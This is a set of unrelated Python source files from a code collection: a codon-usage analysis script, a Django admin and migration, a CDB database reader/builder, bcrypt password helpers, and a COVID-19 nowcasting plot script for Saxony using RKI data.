            return 0
        gene_group_labels = ['all']
    gene_groups = {gene : get_gene_group(gene) for gene in seqs}
    if verbose:
        print("Gene groups:")
        for i in range(len(gene_group_labels)):
            print("%11s: n = %3d" % (gene_group_labels[i], \
                                     sum(1 for gene in seqs if gene_groups[gene] == i)))
    #compute codon usage
    # Three parallel tallies per GI: abundance-weighted, unweighted, and
    # unweighted split by gene group.
    computed_codon_usage = {}
    computed_codon_usage_unw = {}
    computed_codon_usage_groupw = {}
    absolute_usage = {}
    relative_usage = {}
    relative_usage_unw = {}
    relative_usage_groupw = {}
    for gi in gis:
        computed_codon_usage[gi] = defaultdict(int)
        computed_codon_usage_unw[gi] = defaultdict(int)
        computed_codon_usage_groupw[gi] = [defaultdict(int) for i in range(len(groups))]
        for gene,gene_seqs in seqs.items():
            if gi in gene_seqs:
                seq = gene_seqs[gi]
                for i in range(len(seq) // 3):
                    c = seq[3*i:3*(i + 1)]
                    if c != '---' and codon_to_aa[c] != 'Stop':
                        if gene in abundances:
                            computed_codon_usage[gi][c] += abundances[gene]
                        else:
                            computed_codon_usage[gi][c] += 1
                        computed_codon_usage_unw[gi][c] += 1
                        computed_codon_usage_groupw[gi][gene_groups[gene]][c] += 1
        codons_total_gi = sum(computed_codon_usage[gi].values())
        absolute_usage[gi] = {c : x / codons_total_gi for c,x in computed_codon_usage[gi].items()}
        relative_usage[gi] = {}
        relative_usage_unw[gi] = {}
        relative_usage_groupw[gi] = {i : {} for i in range(len(groups))}
        for aa in aa_codons:
            aa_total_gi = 0
            aa_total_unw_gi = 0
            for c in list(codon_to_aa):
                if codon_to_aa[c] == aa:
                    aa_total_gi = aa_total_gi + computed_codon_usage[gi][c]
                    aa_total_unw_gi = aa_total_unw_gi + computed_codon_usage_unw[gi][c]
            for c in aa_codons[aa]:
                try:
                    relative_usage[gi][c] = computed_codon_usage[gi][c] / aa_total_gi
                    relative_usage_unw[gi][c] = computed_codon_usage_unw[gi][c] / aa_total_unw_gi
                except:
                    # NOTE(review): len([c in aa_codons[aa]]) is the length of
                    # a one-element list, i.e. always 1.0 - this looks like it
                    # was meant to be len(aa_codons[aa]) (uniform fallback when
                    # the amino acid never occurs). Also, the bare except
                    # swallows more than the ZeroDivisionError it targets.
                    relative_usage[gi][c] = 1.0/len([c in aa_codons[aa]])
                    relative_usage_unw[gi][c] = 1.0/len([c in aa_codons[aa]])
            for i in range(len(groups)):
                aa_total_groupw_gi_i = sum(computed_codon_usage_groupw[gi][i][c] for c in aa_codons[aa])
                for c in aa_codons[aa]:
                    if aa_total_groupw_gi_i > 0:
                        relative_usage_groupw[gi][i][c] \
                            = computed_codon_usage_groupw[gi][i][c] / aa_total_groupw_gi_i
                    else:
                        relative_usage_groupw[gi][i][c] = 0
    if rerun_flag: #first run through, print general codon usage data
        if verbose:
            print("Writing input_codon_usage.p.gz")
        with gzip.open(os.path.join(output, 'input_codon_usage.p.gz'), 'wb') as f:
            pickle.dump({'groups' : groups,
                         'gene_groups' : gene_groups,
                         'overall_codon_usage' : relative_usage,
                         'unweighted_codon_usage' : relative_usage_unw,
                         'gene_group_codon_usage' : relative_usage_groupw}, f)
        if verbose:
            print("WARNING: Rerun analysis to compute frac-rare groups")
    else: #second run through, print group codon usage data
        codon_list = sorted(c for c in codon_to_aa if codon_to_aa[c] != 'Stop')
        rare_codons = {}
        all_rare_codons = defaultdict(int)
        for gi in gis:
            rare_codons[gi] = sorted(c for c in codon_list \
                                     if israre(relative_usage[gi], rare_model, \
                                               rare_threshold, c))
            for c in rare_codons[gi]:
                all_rare_codons[c] += 1
        if verbose:
            print("Always common codons:", ' '.join(c for c in sorted(codon_list) \
                                                    if c not in all_rare_codons))
            print("Rare codons:")
            # Sort by descending GI-count, then alphabetically.
            for c in sorted(all_rare_codons, key=lambda y: (-all_rare_codons[y], y)):
                print("%s %s %d" % (c, codon_to_aa[c], all_rare_codons[c]))
            print("Writing rare_codons.dat")
        with open(os.path.join(output, 'rare_codons.dat'), 'w') as f:
            for gi in gis:
                f.write("%s %s\n" % (gi, ','.join("%s:%5.3f" % (c, relative_usage_unw[gi][c]) \
                                                  for c in sorted(rare_codons[gi]))))
        # Order codons by amino acid, then by WT usage in the last group.
        codon_list_aa_sorted = sorted(codon_list, \
                                      key=lambda y: (codon_to_aa[y], \
                                                     relative_usage_groupw[wt_gi][len(groups)-1][y]))
        if verbose:
            print("Writing codon_usage.dat")
        with open(os.path.join(output, 'codon_usage.dat'), 'w') as f:
            f.write("# GI gene_group_index gene_group codon_index "
                    "amino_acid codon israre relative_usage\n")
            for gi in gis:
                for c in codon_list_aa_sorted:
                    if c in rare_codons[gi]:
                        israrecodon = 1
                    else:
                        israrecodon = 0
                    for i in range(len(gene_group_labels)):
                        f.write("%32s %2d %s %2d %s %s %d %6.4f\n" % \
                                (gi, i, gene_group_labels[i], codon_list_aa_sorted.index(c), \
                                 codon_to_aa[c], c, israrecodon, relative_usage_groupw[gi][i][c]))
                    f.write("\n")
                f.write("\n")
        if verbose:
            print("Writing codon_usage_wt.dat")
        with open(os.path.join(output, 'codon_usage_wt.dat'), 'w') as f:
            f.write("# GI gene_group_index gene_group codon_index "
                    "amino_acid codon israre relative_usage\n")
            for c in codon_list_aa_sorted:
                if c in rare_codons[wt_gi]:
                    israrecodon = 1
                else:
                    israrecodon = 0
                for i in range(len(gene_group_labels)):
                    f.write("%32s %2d %s %2d %s %s %d %6.4f\n" % \
                            (wt_gi, i, gene_group_labels[i], codon_list_aa_sorted.index(c), \
                             codon_to_aa[c], c, israrecodon, relative_usage_groupw[wt_gi][i][c]))
                f.write("\n")
        if verbose:
            print("Writing codon_usage.p.gz")
        with gzip.open(os.path.join(output, 'codon_usage.p.gz'), 'wb') as f:
            pickle.dump({'groups' : groups,
                         'gene_groups' : gene_groups,
                         'overall_codon_usage' : relative_usage,
                         'unweighted_codon_usage' : relative_usage_unw,
                         'gene_group_codon_usage' : relative_usage_groupw}, f)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('fasta', type=str, nargs='+', help="path to input MSA fasta file(s)")
    parser.add_argument('--abundances', default=None, type=str, help="path to protein abundance file")
    parser.add_argument('--output', type=str, metavar='PATH', default="", help="path to the directory into which the output should be written")
    parser.add_argument('--rare-model', choices={'no_norm', 'cmax_norm'}, default='no_norm', \
                        help="normalization mode for defining rare codons ['no_norm']")
    parser.add_argument('--rare-threshold', type=float, default=0.1, \
                        help="threshold for codon rarity [0.1]")
    parser.add_argument('--max-len-diff', type=float, default=0.2, metavar='DIFF', \
                        help="maximum relative sequence-length difference compared to the WT [0.2]")
    parser.add_argument('--group-dpercentile', type=int, default=10, metavar='D', \
                        help="percentile width for gene-group calculations [10]")
    parser.add_argument('--wt-gi', type=str, default='gi|556503834|ref|NC_000913.3|', \
                        help="GI for WT sequence")
    parser.add_argument('--gi-index', type=str, default=None, \
                        help="path to index of GIs versus subject titles [None]")
    args = parser.parse_args()
    # NOTE(review): calc_codon_usage's `verbose` parameter is not exposed on
    # the CLI, so command-line runs are always quiet.
    calc_codon_usage(args.fasta, args.abundances, args.output, args.rare_model, args.rare_threshold, args.max_len_diff, args.group_dpercentile, args.wt_gi, args.gi_index)
10,535 | de442d9a04b55880c69ac1ddef826d1895fd3a60 | # coding=utf-8
from django.contrib import admin
from users.models import Donors
class DonorsAdmin(admin.ModelAdmin):
    """Admin configuration for Donors: address fieldset, name search/filter."""
    fieldsets = (
        # Fieldset title is user-facing (Portuguese: "Basic information").
        ('Informações Básicas', {
            'fields': ('name', 'address', 'number',
                       'complement', 'neighborhood', 'city', 'state', 'cep', )
        }),
    )
    list_display = ['name']
    search_fields = ('name',)
    list_filter = ['name', 'created_at']
list_filter = ['name', 'created_at']
admin.site.register(Donors, DonorsAdmin)
|
10,536 | 0afc2ccc562263de9b3e118753bc56bb878dec3c | # CDB implemented in python ... with a pythonic interface!
# Starting point provided by Yusuke Shinyama
# Eric Ritezel -- February 17, 2007
#
# 20070218 - longstream optimization started
# there's something slow about this. low memory usage, though.
# 20070219 - had dream that led to increased performance.
#
from struct import unpack, pack
import array
# calc hash value with a given key (6.644s against 50k | 8.679s w/o psyco)
def calc_hash(string):
    """CDB hash: djb2-style h = (h * 33) ^ byte, masked to 32 bits.

    `string` must be a byte string (array('B', ...) iterates its byte
    values).
    """
    # Fix: 0xffffffff without the 'L' suffix - the long-literal suffix is a
    # SyntaxError on Python 3, while the plain literal behaves identically
    # on Python 2 (ints auto-promote to long).
    h = 5381
    for c in array.array('B', string):
        h = ((h << 5) + h) ^ c
    return h & 0xffffffff
# attempt to use psyco for binding calc hash -- not a big deal
# (best-effort JIT acceleration: the bare except is deliberate so that any
# psyco import/runtime failure silently falls back to pure Python)
try:
    from psyco import bind
    bind(calc_hash)
except:pass
class reader(object):
    """
    Pythonic reader for D. J. Bernstein's CDB (constant database) format.

    File layout (all integers little-endian uint32):
      [header]  256 pairs of (table offset, table cell count)
      [data]    records of [key_len][value_len][key][value]
      [tables]  256 hash tables of (hash, record offset) cells
    NOT thread safe: every lookup shares one file handle/seek position.

    Usage:
    >>> read = reader("test.cdb")
    >>> read["a key"]
    >>> for (key, value) in read.iteritems(): ...
    """
    def __init__(self, infile):
        """Open *infile* (path or file object) and cache the 2 KB header."""
        if isinstance(infile, str): self.filep = open(infile, "r+b")
        else: self.filep = infile
        self.filep.seek(0)
        self.start = self.filep.tell()
        # 256 (offset, ncells) pairs = 512 uint32s
        self.header = unpack('<512L', self.filep.read(2048))
        # the smallest table offset marks where the data region ends
        self.enddata = min(self.header[0::2])

    def __get(self, index, single=True):
        """Return a tuple of the value(s) stored under *index*.

        Probes the key's hash table linearly from the predicted slot.
        Raises KeyError when no record matches; with single=True the
        search stops at the first hit.
        """
        return_value = []
        hash_prime = calc_hash(index)
        # locate this key's table via the cached header
        headhash = hash_prime % 256
        pos_bucket = self.header[headhash + headhash]
        ncells = self.header[headhash + headhash + 1]
        # a zero cell count means the key cannot be present
        if ncells == 0: raise KeyError
        # predictive start slot within the table
        offset = (hash_prime >> 8) % ncells
        found = False
        for step in range(ncells):
            self.filep.seek(pos_bucket + ((offset + step) % ncells) * 8)
            (hash, pointer) = unpack('<LL', self.filep.read(8))
            # an empty cell terminates the probe chain
            if pointer == 0:
                if not found: raise KeyError
                break
            if hash == hash_prime:
                self.filep.seek(pointer)
                (klen, vlen) = unpack('<LL', self.filep.read(8))
                key = self.filep.read(klen)
                value = self.filep.read(vlen)
                # hashes can collide; confirm the actual key bytes
                if key == index:
                    return_value.append(value)
                    if single: break
                    found = True
        else:
            # probed every cell without hitting an empty one: no record
            raise KeyError
        return tuple(return_value)

    def __getitem__(self, index):
        """Dict-style lookup; returns the tuple of matching value(s).

        Bug fix: the original called __get but dropped its result, so
        subscripting always returned None.  It now returns the tuple.
        """
        if not isinstance(index, str): raise TypeError
        return self.__get(index)

    def get(self, index, default=None):
        """Return ALL values for *index*; fall back to *default* if given."""
        try:
            return self.__get(index, single=False)
        except:
            # NOTE(review): bare except preserved from the original --
            # it also masks I/O/format errors, not just missing keys.
            if default is not None: return default
            raise KeyError

    def has_key(self, index):
        """A simple analog of the has_key dict function."""
        try:
            self.__get(index)
            return True
        except:
            return False

    def iteritems(self):
        """Yield (key, value) pairs by scanning the data region in order."""
        self.filep.seek(self.start + 2048)
        while self.filep.tell() < self.enddata - 1:
            (klen, vlen) = unpack('<LL', self.filep.read(8))
            yield (self.filep.read(klen), self.filep.read(vlen))

    def close(self):
        """Close out the file connection."""
        self.filep.close()
class builder(object):
    """
    The Constant Database system is by DJB (the greatest hero on the interwub)
    I just happen to implement it here because it's 1.fast, 2.good, 3.fast.
    And I need all three aspects.
    Usage:
    >>> build = builder("test.cdb")
    >>> build['a key'] = 'some value n for stupid'
    >>> build.close()
    The resultant CDB is read by any compatible lib (including reader above)
    Access times are good, but can be made mucho faster with psyco.
    """
    def __init__(self, infile):
        # accept either a path or an already-open writable file object
        if isinstance(infile, str):
            self.filep = open(infile, "w+b")
        else: self.filep = infile
        # attempt to read file from the start
        self.filep.seek(0)
        self.start = self.filep.tell()
        # 256 per-bucket arrays of alternating (hash, pointer) entries
        self.hashbucket = [ array.array('L') for i in range(256) ]
        # skip past header storage (file header + 2048); records go here
        self.position_hash = self.start + 2048
        self.filep.seek(self.position_hash)
    def __setitem__(self, index, value):
        """CDB supports multiple values for each key. Problems? Too bad."""
        # write the record: [key_len][value_len][key][value]
        self.filep.write(pack('<LL',len(index), len(value)))
        self.filep.write(index)
        self.filep.write(value)
        # grab a hash for the key
        hash = calc_hash(index)
        # remember (hash, record offset) for the key's bucket; the
        # offset is recorded BEFORE advancing past this record
        self.hashbucket[hash % 256].fromlist([hash, self.position_hash])
        self.position_hash += 8 + (len(index) + len(value))
    def close(self):
        """Write the 256 hash tables and the header, then close the file."""
        from sys import byteorder
        # preinitialize array and find byteorder
        cell = array.array('L')
        shouldswap = (byteorder == 'big')
        # NOTE(review): array typecode 'L' is platform-sized (8 bytes on
        # LP64 systems) while the reader unpacks fixed 4-byte '<L' --
        # verify the on-disk format on 64-bit builds before trusting it.
        # iterate completed values for the hash bucket
        for hpindex in [ i for i in xrange(256) ]:
            ncells = self.hashbucket[hpindex].buffer_info()[1]
            if ncells <= 0:
                # empty bucket: leave a zero cell count for the header pass
                self.hashbucket[hpindex].append(0)
                continue
            # blank table of ncells (hash, pointer) cells
            cell.fromlist([ 0 for i in xrange(ncells+ncells) ])
            # loop over hash pairs (xrange with parameters = fast)
            for i in xrange(0, ncells, 2):
                # pull hash from the hashbucket
                hash = self.hashbucket[hpindex].pop(0)
                # predictive lookup for jump
                index = (hash >> 8) % ncells
                # open addressing: linear-probe past occupied cells
                while cell[index+index] != 0: index = (index + 1) % ncells
                # pull pointer and assign hash/pointer set to cell
                cell[index+index] = hash
                cell[index+index+1] = self.hashbucket[hpindex].pop(0)
            # push length back onto stack (consumed by the header pass)
            self.hashbucket[hpindex].append(ncells)
            # write the hash table (swap bytes if we're bigendian)
            if shouldswap: cell.byteswap()
            cell.tofile(self.filep)
            del cell[:]
        # rewind and emit the header: (table offset, cell count) per bucket
        self.filep.seek(self.start)
        for i in xrange(256):
            self.filep.write(pack('<LL', self.position_hash, self.hashbucket[i][0]))
            self.position_hash += 8 * self.hashbucket[i].pop()
        # free up the hashbucket and cell
        del(cell)
        del(self.hashbucket)
        self.filep.close()
# a rather complete test suite (Python 2: print statements, xrange, hotshot)
if __name__ == "__main__":
    import os,sys,time
    from random import randint, seed
    import hotshot, hotshot.stats
    # make python behave for our massive crunching needs
    sys.setcheckinterval(10000)
    # utility: random uppercase ASCII string, 1-32 chars
    def randstr(): return "".join([ chr(randint(65,90)) for i in xrange(randint(1,32)) ])
    def make_data(n):
        # build n random (key, value) pairs for the write tests
        print "TEST: Making test data"
        return [ (randstr(),randstr()) for i in xrange(n)]
    def test_write(testlist, fname="test.cdb"):
        starttime = time.time()
        # initialize a builder system for a cdb
        print "TEST: Building CDB"
        a = builder(fname)
        # run the test
        for (item,value) in testlist: a[item] = value
        # exercise multi-value keys: five values under 'meat'
        a['meat'] = "moo"
        a['meat'] = "baa"
        a['meat'] = "bow wow"
        a['meat'] = "mew"
        a['meat'] = "ouch"
        # close the builder
        a.close()
        print "TEST: %fs to run build" % (time.time() - starttime)
    def test_read(fname="test.cdb"):
        # round-trip check: enumerate keys, then fetch each by key
        print "TEST: Doing read of",fname
        cdb = reader(fname)
        print 'TEST: Should be False: cdb["not a key"] =', cdb.has_key("not a key")
        if cdb.has_key("meat"):
            print 'TEST: Multiple values: cdb["meat"] =', cdb.get("meat")
        starttime = time.time()
        print "TEST: Reconstructing keys from database"
        testlist = {}
        for (key, values) in cdb.iteritems(): testlist[key]=None
        print "TEST: %fs to run fetch" % (time.time() - starttime)
        starttime = time.time()
        print "TEST: Reading",len(testlist),"entries by access key"
        for slug in testlist.keys(): cdb.get(slug)
        print "TEST: %fs to run fetch" % (time.time() - starttime)
        cdb.close()
    def test_massive(testlist, fname="stress.cdb", massive=10**5):
        # stress test: write `massive` records cycling through testlist
        starttime = time.time()
        print "TEST: Massive stress test for large databases (%d entries)" % massive
        a = builder(fname)
        for i in xrange(massive):
            a[testlist[i%len(testlist)][0]] = testlist[i%len(testlist)][1]
            if not i % (massive / 37): print '.', #print "%3.1f%% complete" % (float(i) / (5*(10**6))*100)
        a.close()
        print 'done'
        print "TEST: %fs to run write" % (time.time() - starttime)
    ##############################################
    ###############TESTSUITEBLOCK#################
    ##############################################
    data = make_data(1000)
    test_massive(data, massive=10000)
    del(data)
    test_read(fname='stress.cdb')
    exit(1)
    # NOTE(review): everything below is unreachable due to exit(1) above;
    # also test_read() takes no `nomeat` kwarg, so the last runcall would
    # raise TypeError if ever re-enabled.
    # launch profiler test suite
    prof = hotshot.Profile("pycdb.prof")
    data = make_data(500000)
    prof.runcall(test_write, data)
    prof.runcall(test_read)
    prof.runcall(test_massive, data, massive=500000, fname="stress.cdb")
    prof.runcall(test_read, fname="stress.cdb", nomeat=True)
    prof.close()
    print "TEST: Loading hotshot stats"
    stats = hotshot.stats.load("pycdb.prof")
    stats.strip_dirs()
    stats.sort_stats('time', 'calls')
    stats.print_stats(20)
|
10,537 | 503b2c2580d35db2b5fb4ddb910142dc3d450f19 | import bcrypt
import base64
def get_log_psw_from_header(header):
    """Decode a Basic-auth style header into ``[login, password, ...]``.

    Takes the token after the first space, base64-decodes it, and
    splits the ``login:password`` payload on every ':'.
    """
    token = header.split(' ')[1]
    credentials = base64.b64decode(token.encode('utf-8')).decode('utf-8')
    return credentials.split(':')
def check_psw(decoded_psw, psw_from_db):
    """Return True when *decoded_psw* matches the bcrypt hash *psw_from_db*."""
    return bcrypt.checkpw(decoded_psw.encode(), psw_from_db.encode())
def password_hashing(password):
    """Return a salted bcrypt hash of *password*, decoded to str."""
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()
|
10,538 | a72c3abb96fae528ad8cc1680e0de7f223f9bcd4 | # -*- coding: utf-8 -*-
# Partial sum of the harmonic series: H_100 = 1/1 + 1/2 + ... + 1/100.
S = sum(1 / (i + 1) for i in range(100))
print("%.2f" % S)
10,539 | 88f765484a9018f4bfa96234d951d513d9795b9a | #!/usr/bin/python3
import json
import requests
import datetime
import matplotlib.pyplot
import matplotlib.dates
import math
from matplotlib import rcParams
from matplotlib.patches import Rectangle
from rpy2.robjects.packages import importr
from rpy2.robjects.vectors import DataFrame
import rpy2.robjects as robjects
last_days_not_shown = 7
now = datetime.datetime.now()
starttimestamp = datetime.datetime(2020, 3, 2, 0, 0)
days_to_present = (now - starttimestamp).days
days = [starttimestamp + datetime.timedelta(days=days_elapsed) for days_elapsed in range(days_to_present)]
# execute R script for nowcasting and retrieve results
robjects.r('source(\'./nowcasting_covid19_saxony.R\')');
ncs_df = robjects.r['ncs_df']
print(ncs_df)
nowcasting_predicted = [0] * days_to_present
nowcasting_predicted_lower = [0] * days_to_present
nowcasting_predicted_upper = [0] * days_to_present
for day_number in range(0, len(ncs_df[0])):
day = datetime.datetime(1970, 1, 1, 0, 0) + datetime.timedelta(days=int(ncs_df[0][day_number]))
days_since_start = (day - starttimestamp).days
nowcasting_predicted[days_since_start] = ncs_df[2][day_number] - ncs_df[1][day_number]
nowcasting_predicted_lower[days_since_start] = ncs_df[2][day_number] - ncs_df[3][day_number]
nowcasting_predicted_upper[days_since_start] = ncs_df[4][day_number] - ncs_df[2][day_number]
print(day, days_since_start, nowcasting_predicted[days_since_start], nowcasting_predicted_lower[days_since_start], nowcasting_predicted_upper[days_since_start])
# retrieve data for daily symtom onset numbers and imputation
def get_data_from_json_url(url, attribute_day, attribute_data):
    """Fetch an ArcGIS 'features' JSON feed and bucket one attribute by day.

    Returns a list of length days_to_present (module global); index i holds
    the value of *attribute_data* for day starttimestamp + i days, 0 where
    the feed has no entry.  Relies on module globals days_to_present and
    starttimestamp.
    NOTE(review): the feed's timestamps are in milliseconds and
    fromtimestamp() uses the LOCAL timezone -- presumably intended for this
    dataset, but verify around DST transitions.
    """
    data_json = requests.get(url)
    data = json.loads(data_json.content)['features']
    day_entries = [0] * days_to_present
    for day_entry in data:
        day_attributes = day_entry['attributes']
        date = datetime.datetime.fromtimestamp(day_attributes[attribute_day] / 1000)
        days_since_start = (date - starttimestamp).days
        print(date.strftime('%Y-%m-%d'), day_attributes[attribute_data])
        day_entries[days_since_start] = day_attributes[attribute_data]
    return day_entries
def create_delay_statistics_from_json_url(url):
    """Fetch ArcGIS case records and collect reporting delays per day.

    Returns a list of length days_to_present (module global); entry i is a
    list of reporting delays (days between symptom onset and report), one
    element per case reported on day starttimestamp + i.
    """
    data_json = requests.get(url)
    data = json.loads(data_json.content)['features']
    # Bug fix: the original used `[[]] * days_to_present`, which creates
    # days_to_present references to ONE shared list, so every case's delay
    # was appended into a single bucket.  Build independent lists instead.
    day_entries = [[] for _ in range(days_to_present)]
    for case_entry in data:
        case_attributes = case_entry['attributes']
        reporting_date = datetime.datetime.fromtimestamp(case_attributes['Meldedatum'] / 1000)
        onset_symptoms_date = datetime.datetime.fromtimestamp(case_attributes['Refdatum'] / 1000)
        reporting_delay = (reporting_date - onset_symptoms_date).days
        case_count = int(case_attributes['AnzahlFall'])
        days_since_start = (reporting_date - starttimestamp).days
        # one delay entry per reported case
        for i in range(0, case_count):
            day_entries[days_since_start].append(reporting_delay)
    print(day_entries)
    return day_entries
url_diagnosis_delay = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D1&objectIds=&time=&resultType=none&outFields=Meldedatum%2CRefdatum%2CAnzahlFall&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Meldedatum&groupByFieldsForStatistics=&outStatistics=&having=&resultOffset=&resultRecordCount=&sqlFormat=none&f=pjson&token='
print("\nDiagnoseverzug: \n")
diagnosis_delay = create_delay_statistics_from_json_url(url_diagnosis_delay)
url_onset_symptoms = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D1&objectIds=&time=&resultType=none&outFields=&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Refdatum&groupByFieldsForStatistics=Refdatum&outStatistics=%5B%0D%0A++%7B%0D%0A++++statisticType%3A+%22sum%22%2C%0D%0A++++onStatisticField%3A+%22AnzahlFall%22%2C%0D%0A++++outStatisticFieldName%3A+%22AnzahlFallSumme%22%0D%0A++%7D%0D%0A%5D&having=&resultOffset=&resultRecordCount=&sqlFormat=standard&f=pjson&token='
print("\nErkrankungsfälle: \n")
onset_symptoms = get_data_from_json_url(url_onset_symptoms, 'Refdatum', 'AnzahlFallSumme')
url_onset_symptoms_unknown = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D0&objectIds=&time=&resultType=none&outFields=&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Refdatum&groupByFieldsForStatistics=Refdatum&outStatistics=%5B%0D%0A++%7B%0D%0A++++statisticType%3A+%22sum%22%2C%0D%0A++++onStatisticField%3A+%22AnzahlFall%22%2C%0D%0A++++outStatisticFieldName%3A+%22AnzahlFallSumme%22%0D%0A++%7D%0D%0A%5D&having=&resultOffset=&resultRecordCount=&sqlFormat=standard&f=pjson&token='
print("\nErkrankungsfälle mit unbekanntem Erkrankungsdatum: \n")
onset_symptoms_unknown = get_data_from_json_url(url_onset_symptoms_unknown, 'Refdatum', 'AnzahlFallSumme')
def add_imputed_case_for_day(reporting_date, delay):
    """Shift one case back by *delay* days and count it as a symptom onset.

    Both arguments are day offsets relative to starttimestamp.  Increments
    the module-level onset_symptoms_imputed bucket; cases whose imputed
    onset falls outside the observation window are silently dropped.
    """
    onset_symptoms_date_imputed = reporting_date - delay
    if onset_symptoms_date_imputed >= 0 and onset_symptoms_date_imputed < days_to_present:
        onset_symptoms_imputed[onset_symptoms_date_imputed] += 1
# move unkown symptoms cases to imputed values
onset_symptoms_imputed = [0] * days_to_present
for reporting_date in range(0, len(onset_symptoms_unknown)):
delay_for_reporting_date = sorted(diagnosis_delay[reporting_date])
cases_to_impute_for_reporting_date = onset_symptoms_unknown[reporting_date]
# do a quantile imputation
for i in range (0, cases_to_impute_for_reporting_date):
quantile = (i + 0.5) / cases_to_impute_for_reporting_date
position_in_array = round(quantile * len(delay_for_reporting_date))
case_delay_for_quantile = delay_for_reporting_date[position_in_array]
add_imputed_case_for_day(reporting_date, case_delay_for_quantile)
# plot data
xticsdatetimes = []
xticslabels = []
for days_elapsed in range(days_to_present):
xticdate = starttimestamp + datetime.timedelta(days=days_elapsed)
if (xticdate.day == 1 or xticdate.day == 10 or xticdate.day == 20):
xticsdatetimes.append(xticdate)
xticslabels.append(xticdate.strftime('%d.%m.'))
dates = matplotlib.dates.date2num(days)
xticsdates = matplotlib.dates.date2num(xticsdatetimes)
onset_symptoms_reported_imputed = [ onset_symptoms[i] + onset_symptoms_imputed[i] for i in range(0, len(onset_symptoms_imputed)) ]
onset_symptoms_reported_imputed_nowcast = [ onset_symptoms[i] + onset_symptoms_imputed[i] + nowcasting_predicted[i] for i in range(0, len(onset_symptoms_imputed)) ]
fig, ax = matplotlib.pyplot.subplots()
ax.bar(dates, onset_symptoms, color='#2f86bb', label="Neuerkrankungen (gemeldetes Datum)")
ax.bar(dates, onset_symptoms_imputed, bottom=onset_symptoms, color='#5ea5cf', label="Neuerkrankungen (imputiertes Datum)")
ax.bar(dates, nowcasting_predicted, bottom=onset_symptoms_reported_imputed, color='#db855c', label="Neuerkrankungen (Nowcasting)")
ax.xaxis_date()
matplotlib.pyplot.xticks(ticks=xticsdates, labels=xticslabels, rotation='horizontal')
for tick in ax.get_xticklabels():
tick.set_fontstretch('condensed')
for label in ax.xaxis.get_ticklabels():
label.set_visible(False)
for label in ax.xaxis.get_ticklabels()[2::3]:
label.set_visible(True)
matplotlib.pyplot.legend(prop = {'stretch': 'condensed', 'size': 9}, loc='upper left')
ax.set_xlabel('Erkrankungsdatum')
ax.set_ylabel('Anzahl COVID-19-Neuerkrankungen')
matplotlib.pyplot.xlim(left=matplotlib.dates.date2num(datetime.datetime(2020, 3, 4, 12, 0)))
matplotlib.pyplot.xlim(right=matplotlib.dates.date2num(datetime.datetime(now.year, now.month, now.day, 12) - datetime.timedelta(days=last_days_not_shown)))
matplotlib.pyplot.title("Wirkung der SARS-CoV-2-Eindämmungsmaßnahmen in Sachsen")
ax.text(1.1, -0.13, 'Stand: ' + now.strftime("%d.%m.%Y, %H:%M"), verticalalignment='bottom', horizontalalignment='right', transform=ax.transAxes, fontsize=5)
ax.text(-0.14, -0.13, 'Datenquelle: Robert Koch-Institut, dl-de/by-2-0\nDarstellung: @IGrundrechte (Twitter), CC BY-SA 4.0', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, fontsize=5)
matplotlib.pyplot.savefig("../nowcasting_" + now.strftime("%Y-%m-%d_%H-%M") + ".png", dpi=200)
matplotlib.pyplot.savefig("../nowcasting-latest.png", dpi=200)
d = {'I': robjects.IntVector(onset_symptoms_reported_imputed_nowcast), 'dates': robjects.FloatVector(range(0,len(onset_symptoms_reported_imputed_nowcast)))}
dataf = robjects.DataFrame(d)
EpiEstim = importr('EpiEstim')
res_parametric_si = EpiEstim.estimate_R(dataf, method="parametric_si", config=EpiEstim.make_config(robjects.vectors.ListVector({'mean_si' : 5.0, 'std_si' : 1.9})))
# copy values from data frame to python arrays; omit first and last values (may be wrong)
start_index_r = 2
end_index_r = -7
mean_r = res_parametric_si[0][2][start_index_r:end_index_r]
quantile0_025_r = res_parametric_si[0][4][start_index_r:end_index_r]
quantile0_975_r = res_parametric_si[0][9][start_index_r:end_index_r]
days_for_r = [days[int(0.5 * (res_parametric_si[0][1][i] + res_parametric_si[0][0][i]))] for i in range(start_index_r, len(res_parametric_si[0][0][0:end_index_r]))]
dates_for_r = matplotlib.dates.date2num(days_for_r)
print(res_parametric_si)
ax2 = ax.twinx()
ax2.set_ylim(top=5)
ax2.set_ylabel('Effektive Reproduktionszahl') # we already handled the x-label with ax1
ax2.plot(dates_for_r, mean_r, color="#8a20a2", label="effektive Reproduktionszahl")
ax2.plot(dates_for_r, quantile0_025_r, color="#bb96c4", linewidth=0.7)
ax2.plot(dates_for_r, quantile0_975_r, color="#bb96c4", linewidth=0.7)
matplotlib.pyplot.legend(prop = {'stretch': 'condensed', 'size': 9}, loc='upper right')
matplotlib.pyplot.savefig("../nowcasting-r_" + now.strftime("%Y-%m-%d_%H-%M") + ".png", dpi=200)
matplotlib.pyplot.savefig("../nowcasting-r-latest.png", dpi=200)
|
10,540 | 8a77bce21d5d59ab57f85b1cbd6d27dd5b0162d8 | # Generated by Django 3.1.6 on 2021-02-10 11:18
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds boolean ``mode`` (default False) to blog.Post."""

    dependencies = [
        ('blog', '0002_post_body'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='mode',
            field=models.BooleanField(default=False),
        ),
    ]
|
10,541 | e21f62a8dc69087c1a818920f3d2ef4c3b2e1e42 | import yaml
import xmltodict
from xml.dom import pulldom
from xml.sax import make_parser, SAXException
